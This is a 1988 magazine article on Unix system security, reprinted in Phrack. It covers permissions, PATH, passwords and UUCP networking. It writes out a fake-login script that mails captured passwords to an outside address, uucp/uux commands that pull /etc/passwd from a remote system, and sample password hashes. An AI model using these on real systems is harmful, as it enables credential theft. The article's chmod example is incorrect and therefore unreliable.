| ==Phrack Inc.== | |
| Volume Two, Issue 18, Phile #7 of 11 | |
| +--------------------------------------+ | |
| | "Unix System Security Issues" | | |
| | Typed by: | | |
| | Whisky | | |
| | (from Holland, Europe) | | |
| +--------------------------------------+ | |
| | From | | |
| | Information Age | | |
| | Vol. 11, Number 2, April 1988 | | |
| | Written By: | | |
| | Michael J. Knox and Edward D. Bowden | | |
| +--------------------------------------+ | |
| Note: This file was sent to me from a friend in Holland. I felt | |
| that it would be a good idea to present this file to the | |
| UNIX-hacker community, to show that hackers don't always | |
| harm systems, but sometimes look for ways to secure flaws | |
| in existing systems. -- Jester Sluggo !! | |
| There are a number of elements that have lead to the popularity of the Unix | |
| operating system in the world today. The most notable factors are its | |
| portability among hardware platforms and the interactive programming | |
| environment that it offers to users. In fact, these elements have had much to | |
| do with the successful evolution of the Unix system in the commercial market | |
| place. (1, 2) | |
| As the Unix system expands further into industry and government, the need to | |
| handle Unix system security will no doubt become imperative. For example, the | |
| US government is committing several million dollars a year for the Unix system | |
| and its supported hardware. (1) The security requirements for the government | |
| are tremendous, and one can only guess at the future needs of security in | |
| industry. | |
| In this paper, we will cover some of the more fundamental security risks in | |
| the Unix system. Discussed are common causes of Unix system compromise in | |
| such areas as file protection, password security, networking and hacker | |
| violations. In our conclusion, we will comment upon ongoing effects in Unix | |
| system security, and their direct influence on the portability of the Unix | |
| operating system. | |
| FILE AND DIRECTORY SECURITY | |
| In the Unix operating system environment, files and directories are organized | |
| in a tree structure with specific access modes. The setting of these modes, | |
| through permission bits (as octal digits), is the basis of Unix system | |
| security. Permission bits determine how users can access files and the type | |
| of access they are allowed. There are three user access modes for all Unix | |
| system files and directories: the owner, the group, and others. Access to | |
| read, write and execute within each of the usertypes is also controlled by | |
| permission bits (Figure 1). Flexibility in file security is convenient, but | |
| it has been criticized as an area of system security compromise. | |
| Permission modes | |
| OWNER GROUP OTHERS | |
| ------------------------------------------------------------ | |
| rwx : rwx : rwx | |
| ------------------------------------------------------------ | |
| r=read w=write x=execute | |
| -rw--w-r-x 1 bob csc532 70 Apr 23 20:10 file | |
| drwx------ 2 sam A1 2 May 01 12:01 directory | |
| FIGURE 1. File and directory modes: File shows Bob as the owner, with read | |
| and write permission. Group has write permission, while Others has read and | |
| execute permission. The directory gives a secure directory not readable, | |
| writeable, or executable by Group and Others. | |
| Since the file protection mechanism is so important in the Unix operating | |
| system, it stands to reason that the proper setting of permission bits is | |
| required for overall security. Aside from user ignorance, the most common | |
| area of file compromise has to do with the default setting of permission bits | |
| at file creation. In some systems the default is octal 644, meaning that only | |
| the file owner can write and read to a file, while all others can only read | |
| it. (3) In many "open" environments this may be acceptable. However, in | |
| cases where sensitive data is present, the access for reading by others should | |
| be turned off. The file utility umask does in fact satisfy this requirement. | |
| A suggested setting, umask 027, would enable all permission for the file | |
| owner, disable write permission to the group, and disable permissions for all | |
| others (octal 750). By inserting this umask command in a user .profile or | |
| .login file, the default will be overwritten by the new settings at file | |
| creation. | |
| The CHMOD utility can be used to modify permission settings on files and | |
| directories. Issuing the following command, | |
| chmod u+rwd,g+rw,g-w,u-rwx file | |
| will provide the file with the same protection as the umask above (octal 750). | |
| Permission bits can be relaxed with chmod at a later time, but at least | |
| initially, the file structure can be made secure using a restrictive umask. | |
| By responsible application of such utilities as umask and chmod, users can | |
| enhance file system security. The Unix system, however, restricts the | |
| security defined by the user to only owner, group and others. Thus, the owner | |
| of the file cannot designate file access to specific users. As Kowack and | |
| Healy have pointed out, "The granularity of control that (file security) | |
| mechanisms is often insufficient in practice (...) it is not possible to grant | |
| one user write protection to a directory while granting another read | |
| permission to the same directory. (4) A useful file security file security | |
| extension to the Unix system might be Multics style access control lists. | |
| With access mode vulnerabilities in mind, users should pay close attention | |
| to files and directories under their control, and correct permissions whenever | |
| possible. Even with the design limitations in mode granularity, following a | |
| safe approach will ensure a more secure Unix system file structure. | |
| SUID and SGID | |
| The set user id (suid) and set group id (sgid) identify the user and group | |
| ownership of a file. By setting the suid or sgid permission bits of an | |
| executable file, other users can gain access to the same resources (via the | |
| executable file) as that of the real file's owner. | |
| For Example: | |
| Let Bob's program bob.x be an executable file accessible to others. When Mary | |
| executes bob.x, Mary becomes the new program owner. If during program | |
| execution bob.x requests access to file browse.txt, then Mary must have | |
| previous read or write permission to browse.txt. This would allow Mary and | |
| everyone else total access to the contents of browse.txt, even when she is not | |
| running bob.x. By turning on the suid bit of bob.x, Mary will have the same | |
| access permissions to browse.txt as does the program's real owner, but she | |
| will only have access to browse.txt during the execution of bob.x. Hence, by | |
| incorporating suid or sgid, unwelcome browsers will be prevented from | |
| accessing files like browse.txt. | |
| Although this feature appears to offer substantial access control to Unix | |
| system files, it does have one critical drawback. There is always the chance | |
| that the superuser (system administrator) may have a writable file for others | |
| that is also set with suid. With some modification in the file's code (by a | |
| hacker), an executable file like this would enable a user to become a | |
| superuser. Within a short period of time this violator could completely | |
| compromise system security and make it inaccessible, even to other superusers. | |
| As Farrow (5) puts it, "(...) having a set-user-id copy of the shell owned by | |
| root is better than knowing the root password". | |
| To compensate for this security threat, writable suid files should be sought | |
| out and eliminated by the system administrator. Reporting of such files by | |
| normal users is also essential in correcting existing security breaches. | |
| DIRECTORIES | |
| Directory protection is commonly overlooked component of file security in the | |
| Unix system. Many system administrators and users are unaware of the fact, | |
| that "publicly writable directories provide the most opportunities for | |
| compromising the Unix system security" (6). Administrators tend to make these | |
| "open" for users to move around and access public files and utilities. This | |
| can be disastrous, since files and other subdirectories within writable | |
| directories can be moved out and replaced with different versions, even if | |
| contained files are unreadable or unwritable to others. When this happens, an | |
| unscrupulous user or a "password breaker" may supplant a Trojan horse of a | |
| commonly used system utility (e.g. ls, su, mail and so on). For example, | |
| imagine | |
| For example: | |
| Imagine that the /bin directory is publicly writable. The perpetrator could | |
| first remove the old su version (with rm utility) and then include his own | |
| fake su to read the password of users who execute this utility. | |
| Although writable directories can destroy system integrity, readable ones | |
| can be just as damaging. Sometimes files and directories are configured to | |
| permit read access by other. This subtle convenience can lead to unauthorized | |
| disclosure of sensitive data: a serious matter when valuable information is | |
| lost to a business competitor. | |
| As a general rule, therefore, read and write access should be removed from | |
| all but system administrative directories. Execute permission will allow | |
| access to needed files; however, users might explicitly name the file they | |
| wish to use. This adds some protection to unreadable and unwritable | |
| directories. So, programs like lp file.x in an unreadable directory /ddr will | |
| print the contents of file.x, while ls/ddr would not list the contents of that | |
| directory. | |
| PATH VARIABLE | |
| PATH is an environment variable that points to a list of directories, which | |
| are searched when a file is requested by a process. The order of that search | |
| is indicated by the sequence of the listed directories in the PATH name. This | |
| variable is established at user logon and is set up in the users .profile of | |
| .login file. | |
| If a user places the current directory as the first entry in PATH, then | |
| programs in the current directory will be run first. Programs in other | |
| directories with the same name will be ignored. Although file and directory | |
| access is made easier with a PATH variable set up this way, it may expose the | |
| user to pre-existing Trojan horses. | |
| To illustrate this, assume that a Trojan horse, similar to the cat utility, | |
| contains an instruction that imparts access privileges to a perpetrator. The | |
| fake cat is placed in a public directory /usr/his where a user often works. | |
| Now if the user has a PATH variable with the current directory first, and he | |
| enters the cat command while in /usr/his, the fake cat in /usr/his would be | |
| executed but not the system cat located in /bin. | |
| In order to prevent this kind of system violation, the PATH variable must be | |
| correctly set. First, if at all possible, exclude the current directory as | |
| the first entry in the PATH variable and type the full path name when invoking | |
| Unix system commands. This enhances file security, but is more cumbersome to | |
| work with. Second, if the working directory must be included in the PATH | |
| variable, then it should always be listed last. In this way, utilities like | |
| vi, cat, su and ls will be executed first from systems directories like /bin | |
| and /usr/bin before searching the user's working directory. | |
| PASSWORD SECURITY | |
| User authentication in the Unix system is accomplished by personal passwords. | |
| Though passwords offer an additional level of security beyond physical | |
| constraints, they lend themselves to the greatest area of computer system | |
| compromise. Lack of user awareness and responsibility contributes largely to | |
| this form of computer insecurity. This is true of many computer facilities | |
| where password identification, authentication and authorization are required | |
| for the access of resources - and the Unix operating system is no exception. | |
| Password information in many time-sharing systems are kept in restricted | |
| files that are not ordinarily readable by users. The Unix system differs in | |
| this respect, since it allows all users to have read access to the /etc/passwd | |
| file (FIGURE 2) where encrypted passwords and other user information are | |
| stored. Although the Unix system implements a one-way encryption method, and | |
| in most systems a modified version of the data encryption standard (DES), | |
| password breaking methods are known. Among these methods, brute-force attacks | |
| are generally the least effective, yet techniques involving the use of | |
| heuristics (good guesses and knowledge about passwords) tend to be successful. | |
| For example, the /etc/passwd file contains such useful information as the | |
| login name and comments fields. Login names are especially rewarding to the | |
| "password breaker" since many users will use login variants for passwords | |
| (backward spelling, the appending of a single digit etc.). The comment field | |
| often contains items such as surname, given name, address, telephone number, | |
| project name and so on. To quote Morris and Grampp (7) in their landmark | |
| paper on Unix system security: | |
| [in the case of logins] | |
| The authors made a survey of several dozen local machines, using as trial | |
| passwords a collection of the 20 most common female first names, each | |
| followed by a single digit. The total number of passwords tried was, | |
| therefore, 200. At least one of these 200 passwords turned out to be a | |
| valid password on every machine surveyed. | |
| [as for comment fields] | |
| (...) if an intruder knows something about the people using a machine, a | |
| whole new set of candidates is available. Family and friend's names, auto | |
| registration numbers, hobbies, and pets are particularly productive | |
| categories to try interactively in the unlikely event that a purely | |
| mechanical scan of the password file turns out to be disappointing. | |
| Thus, given a persistent system violator, there is a strong evidence, that he | |
| will find some information about users in the /etc/passwd file. With this in | |
| mind, it is obvious that a password file should be unreadable to everyone | |
| except those in charge of system administration. | |
| root:aN2z06ISmxKqQ:0:10:(Boss1),656-35-0989:/:/bin | |
| mike:9okduHy7sdLK8:09:122:No.992-3943:/usr:/bin | |
| FIGURE 2. The /etc/passwd file. Note the comments field as underlined terms. | |
| Resolution of the /etc/passwd file's readability does not entirely solve the | |
| basic problem with passwords. Educating users and administrators is necessary | |
| to assure proper password utilization. First, "good passwords are those that | |
| are at least six characters long, aren't based on personal information, and | |
| have some non-alphabetic (especially control) characters in them: 4score, | |
| my_name, luv2run" (8). Secondly, passwords should be changed periodically but | |
| users should avoid alternating between two passwords. Different passwords for | |
| different machines and files will aid in protecting sensitive information. | |
| Finally, passwords should never be available to unauthorized users. Reduction | |
| of user ignorance about poor password choice will inevitably make a system | |
| more secure. | |
| NETWORK SECURITY | |
| UUCP system | |
| The most common Unix system network is the UUCP system, which is a group of | |
| programs that perform the file transfers and command execution between remote | |
| systems. (3) The problem with the UUCP system is that users on the network | |
| may access other users' files without access permission. As stated by Nowitz | |
| (9), | |
| The uucp system, left unrestricted, will let any outside user execute | |
| commands and copy in/out any file that is readable/writable by a uucp login | |
| user. It is up to the individual sites to be aware of this, and apply the | |
| protections that they feel free are necessary. | |
| This emphasizes the importance of proper implementation by the system | |
| administrator. | |
| There are four UUCP system commands to consider when looking into network | |
| security with the Unix system. The first is uucp, a command used to copy | |
| files between two Unix systems. If uucp is not properly implemented by the | |
| system administrator, any outside user can execute remote commands and copy | |
| files from another login user. If the file name on another system is known, | |
| one could use the uucp command to copy files from that system to their system. | |
| For example: | |
| %uucp system2!/main/src/hisfile myfile | |
| will copy hisfile from system2 in the directory /main/src to the file myfile | |
| in the current local directory. If file transfer restrictions exist on either | |
| system, hisfile would not be sent. If there are no restrictions, any file | |
| could be copied from a remote user - including the password file. The | |
| following would copy the remote system /etc/passwd file to the local file | |
| thanks: | |
| %uucp system2!/etc/passwd thanks | |
| System administrators can address the uucp matter by restricting uucp file | |
| transfers to the directory /user/spool/uucppublic. (8) If one tries to | |
| transfer a file anywhere else, a message will be returned saying "remote | |
| access to path/file denied" and no file transfer will occur. | |
| The second UUCP system command to consider is the uux. Its function is to | |
| execute commands on remote Unix computers. This is called remote command | |
| execution and is most often used to send mail between systems (mail executes | |
| the uux command internally). | |
| The ability to execute a command on another system introduces a serious | |
| security problem if remote command execution is not limited. As an example, a | |
| system should not allow users from another system to perform the following: | |
| %uux "system1!cat</etc/passwd>/usr/spool/uucppublic" | |
| which would cause system1 to send its /etc/passwd file to the system2 uucp | |
| public directory. The user of system2 would now have access to the password | |
| file. Therefore, only a few commands should be allowed to execute remotely. | |
| Often the only command allowed to run uux is rmail, the restricted mail | |
| program. | |
| The third UUCP system function is the uucico (copy in / copy out) program. | |
| It performs the true communication work. Uucp or uux does not actually call | |
| up other systems; instead they are queued and the uucico program initiates the | |
| remote processes. The uucico program uses the file /usr/uucp/USERFILE to | |
| determine what files a remote system may send or receive. Checks for legal | |
| files are the basis for security in USERFILE. Thus the system administrator | |
| should carefully control this file. | |
| In addition, USERFILE controls security between two Unix systems by allowing | |
| a call-back flag to be set. Therefore, some degree of security can be | |
| achieved by requiring a system to check if the remote system is legal before a | |
| call-back occurs. | |
| The last UUCP function is the uuxqt. It controls the remote command | |
| execution. The uuxqt program uses the file /usr/lib/uucp/L.cmd to determine | |
| which commands will run in response to a remote execution request. For | |
| example, if one wishes to use the electronic mail feature, then the L.cmd file | |
| will contain the line rmail. Since uuxqt determines what commands will be | |
| allowed to execute remotely, commands which may compromise system security | |
| should not be included in L.cmd. | |
| CALL THE UNIX SYSTEM | |
| In addition to UUCP network commands, one should also be cautious of the cu | |
| command (call the Unix system). Cu permits a remote user to call another | |
| computer system. The problem with cu is that a user on a system with a weak | |
| security can use cu to connect to a more secure system and then install a | |
| Trojan horse on the stronger system. It is apparent that cu should not be | |
| used to go from a weaker system to a stronger one, and it is up to the system | |
| administrator to ensure that this never occurs. | |
| LOCAL AREA NETWORKS | |
| With the increased number of computers operating under the Unix system, some | |
| consideration must be given to local area networks (LANs). Because LANs are | |
| designed to transmit files between computers quickly, security has not been a | |
| priority with many LANs, but there are secure LANs under development. It is | |
| the job of the system manager to investigate security risks when employing | |
| LANs. | |
| OTHER AREAS OF COMPROMISE | |
| There are numerous methods used by hackers to gain entry into computer | |
| systems. In the Unix system, Trojan horses, spoofs and suids are the primary | |
| weapons used by trespassers. | |
| Trojan horses are pieces of code or shell scripts which usually assume the | |
| role of a common utility but when activated by an unsuspecting user performs | |
| some unexpected task for the trespasser. Among the many different Trojan | |
| horses, it is the su masquerade that is the most dangerous to the Unix system. | |
| Recall that the /etc/passwd file is readable to others, and also contains | |
| information about all users - even root users. Consider what a hacker could | |
| do if he were able to read this file and locate a root user with a writable | |
| directory. He might easily plant a fake su that would send the root password | |
| back to the hacker. A Trojan horse similar to this can often be avoided when | |
| various security measures are followed, that is, an etc/passwd file with | |
| limited read access, controlling writable directories, and the PATH variable | |
| properly set. | |
| A spoof is basically a hoax that causes an unsuspecting victim to believe | |
| that a masquerading computer function is actually a real system operation. A | |
| very popular spool in many computer systems is the terminal-login trap. By | |
| displaying a phoney login format, a hacker is able to capture the user's | |
| password. | |
| Imagine that a root user has temporarily deserted his terminal. A hacker | |
| could quickly install a login process like the one described by Morris and | |
| Grampp (7): | |
| echo -n "login:" | |
| read X | |
| stty -echo | |
| echo -n "password:" | |
| read Y | |
| echo "" | |
| stty echo | |
| echo %X%Y|mail outside|hacker& | |
| sleep 1 | |
| echo Login incorrect | |
| stty 0>/dev/tty | |
| We see that the password of the root user is mailed to the hacker who has | |
| completely compromised the Unix system. The fake terminal-login acts as if | |
| the user has incorrectly entered the password. It then transfers control over | |
| to the stty process, thereby leaving no trace of its existence. | |
| Prevention of spoofs, like most security hazards, must begin with user | |
| education. But an immediate solution to security is sometimes needed before | |
| education can be effected. As for terminal-login spoofs, there are some | |
| keyboard-locking programs that protect the login session while users are away | |
| from their terminals. (8, 10) These locked programs ignore keyboard-generated | |
| interrupts and wait for the user to enter a password to resume the terminal | |
| session. | |
| Since the suid mode has been previously examined in the password section, we | |
| merely indicate some suid solutions here. First, suid programs should be used | |
| is there are no other alternatives. Unrestrained suids or sgids can lead to | |
| system compromise. Second, a "restricted shell" should be given to a process | |
| that escapes from a suid process to a child process. The reason for this is | |
| that a nonprivileged child process might inherit privileged files from its | |
| parents. Finally, suid files should be writable only by their owners, | |
| otherwise others may have access to overwrite the file contents. | |
| It can be seen that by applying some basic security principles, a user can | |
| avoid Trojan horses, spoofs and inappropriate suids. There are several other | |
| techniques used by hackers to compromise system security, but the use of good | |
| judgement and user education may go far in preventing their occurrence. | |
| CONCLUSION | |
| Throughout this paper we have discussed conventional approaches to Unix system | |
| security by way of practical file management, password protection, and | |
| networking. While it can be argued that user education is paramount in | |
| maintaining Unix system security (11) factors in human error will promote some | |
| degree of system insecurity. Advances in protection mechanisms through | |
| better-written software (12), centralized password control (13) and | |
| identification devices may result in enhanced Unix system security. | |
| The question now asked applies to the future of Unix system operating. Can | |
| existing Unix systems accommodate the security requirements of government and | |
| industry? It appears not, at least for governmental security projects. By | |
| following the Orange Book (14), a government graded classification of secure | |
| computer systems, the Unix system is only as secure as the C1 criterion. A C1 | |
| system, which has a low security rating (D being the lowest) provides only | |
| discretionary security protection (DSP) against browsers or non-programmer | |
| users. Clearly this is insufficient as far as defense or proprietary security | |
| is concerned. What is needed are fundamental changes to the Unix security | |
| system. This has been recognized by at least three companies, AT&T, Gould and | |
| Honeywell (15, 16, 17). Gould, in particular, has made vital changes to the | |
| kernel and file system in order to produce a C2 rated Unix operating system. | |
| To achieve this, however, they have had to sacrifice some of the portability | |
| of the Unix system. It is hoped that in the near future a Unix system with an | |
| A1 classification will be realized, though not at the expense of losing its | |
| valued portability. | |
| REFERENCES | |
| 1 Grossman, G R "How secure is 'secure'?" Unix Review Vol 4 no 8 (1986) | |
| pp 50-63 | |
| 2 Waite, M et al. "Unix system V primer" USA (1984) | |
| 3 Filipski, A and Hanko, J "Making Unix secure" Byte (April 1986) pp 113-128 | |
| 4 Kowack, G and Healy, D "Can the holes be plugged?" Computerworld | |
| Vol 18 (26 September 1984) pp 27-28 | |
| 5 Farrow, R "Security issues and strategies for users" Unix/World | |
| (April 1986) pp 65-71 | |
| 6 Farrow, R "Security for superusers, or how to break the Unix system" | |
| Unix/World (May 1986) pp 65-70 | |
| 7 Grampp, F T and Morris, R H "Unix operating system security" AT&T Bell | |
| Lab Tech. J. Vol 63 No 8 (1984) pp 1649-1672 | |
| 8 Wood, P H and Kochan, S G "Unix system security" USA (1985) | |
| 9 Nowitz, D A "UUCP Implementation description: Unix programmer's manual | |
| Sec. 2" AT&T Bell Laboratories, USA (1984) | |
| 10 Thomas, R "Securing your terminal: two approaches" Unix/World | |
| (April 1986) pp 73-76 | |
| 11 Karpinski, D "Security round table (Part 1)" Unix Review | |
| (October 1984) p 48 | |
| 12 Karpinski, D "Security round table (Part 2)" Unix Review | |
| (October 1984) p 48 | |
| 13 Lobel, J "Foiling the system breakers: computer security and access | |
| control" McGraw-Hill, USA (1986) | |
| 14 National Computer Security Center "Department of Defense trusted | |
| computer system evaluation criteria" CSC-STD-001-83, USA (1983) | |
| 15 Stewart, F "Implementing security under Unix" Systems&Software | |
| (February 1986) | |
| 16 Schaffer, M and Walsh, G "Lock/ix: An implementation of Unix for the | |
| Lock TCB" Proceedings of USENIX (1988) | |
| 17 Chuck, F "AT&T System 5/MLS Product 14 Strategy" AT&T Bell Labs, | |
| Government System Division, USA (August 1987) | |
| ============================================================================== | |